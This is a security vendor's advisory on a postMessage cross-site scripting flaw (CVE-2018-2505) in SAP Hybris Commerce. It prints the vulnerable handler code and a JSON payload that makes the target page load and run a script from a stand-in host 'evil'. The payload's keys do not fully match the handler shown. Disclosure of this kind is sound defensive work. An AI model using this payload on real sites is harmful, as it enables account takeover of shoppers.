SAP Hybris Commerce CVE-2018-2505 Vulnerability Discovered

SAP Hybris Commerce  CVE-2018-2505

SAP Hybris is an e-commerce platform that enables its consumers to sell effectively in the B2B and B2C markets. Over the last 8 years, the software has evolved considerably (now in version 5.5) and is now positioned as “an omnichannel commerce solution that facilitates customer engagement.”

 

PostMessage Cross Site Scripting Vulnerability

The AppCheck research team identified a security flaw within SAP Hybris affecting many large online retailers. The security flaw was due to an insecure JavaScript library that allows malicious JavaScript to be injected into a user’s session with the affected Hybris application.

 

Background

Browsers implement a security mechanism that isolates each website loaded within the browser so that scripts loaded in one website cannot access data loaded in another, unless they are within the same origin. An origin is determined by the protocol (http or https), hostname and port number. Two documents (web pages) are within the same origin if those three elements match exactly. Documents within the same origin are permitted to access the same data, for example, a website can open another browser window within the same origin and read/write data to the window. If the site opens a window to another origin, it is not permitted access.

 

This security feature, known as the Same Origin Policy (SOP) prevents a malicious website from being able to access data from other applications the user happens to have an authenticated session with. Whilst the SOP is an important security principal, there are occasions when cross-origin communication is desirable. For example, website components such as Facebook widgets may need to share data between components loaded from Facebook and the hosting site. One mechanism to allow this is postMessage. In simple terms, postMessage allows developers to submit messages from one origin to another, the code implementing postMessage then decides how the message data will be processed. A vulnerability can occur if the postMessage handler receiving the message does not correctly validate the origin of the message before processing the data in a way that can be abused.

 

The Vulnerability

The SAP Hybrid platform was found to implement an insecure postMessage handler function that allows the attacker to submit a specially crafted postMessage event to perform a Cross-Site Scripting vulnerability.

In practical terms, to exploit the flaw the attacker would create a malicious website that when accessed would open a browser window to the target SAP Hybris application. Once opened, the malicious site would then submit a postMessage event to inject a JavaScript payload into the page. The payload is then able to access all the same data and carry out the same actions as the user. Should the user be authenticated, the payload could then take control of the users account.

 

Technical Details

The following function (and minor variations of it) was identified across many ecommerce sites using the SAP hybrid platform:

function(t) {
    var e = t.data;
    if (e.gatewayId === smartEditBootstrapGatewayId && "bundle" === e.eventId) {
    var n = e.data;
    if (window.smartedit = window.smartedit || {}, n.resources && n.resources.properties)
    for (var o in n.resources.properties) window.smartedit[o] = n.resources.properties[o];
    var r = document.getElementsByTagName("head")[0];
    n.resources && n.resources.js && n.resources.js.length > 0 
   && injectJS(r, n.resources.js, 0), n.resources && n.resources.css 
   && n.resources.css.length > 0 && injectCSS(r, n.resources.css, 0)
}
}

The vulnerability occurs since the message handler processes events from any origin and invokes dangerous functionality via the injectJS function (which permits the injection of JavaScripts).

This flaw can be exploited by submitting the following JSON postMessage payload which will result in the JavaScript file http://evil/payload.js being imported and executed within the target application:

 

{"eventName": "smarteditBootstrap",
   "resources": {
    "js": ["//evil/payload.js"]
   }
}

Detecting the vulnerability

AppCheck is able to detect this vulnerability using a ‘first principals’ approach via the postMessage analysis module. Scanning using the “Standard” profile will detect this flaw.

 

Further Information

To learn more about detecting and exploiting HTML5 postMessage vulnerabilities see the following article: https://appcheck-ng.com/hunting-html-5-postmessage-vulnerabilities/

 

Solution

Fixed in versions (SAP Hybris Commerce, versions 6.2, 6.3, 6.4, 6.5, 6.6, 6.7).

 

Acknowledgements

https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=451071888

Get started with Appcheck

No software to download or install.
Contact us or call us 0113 887 8380

Start your free trial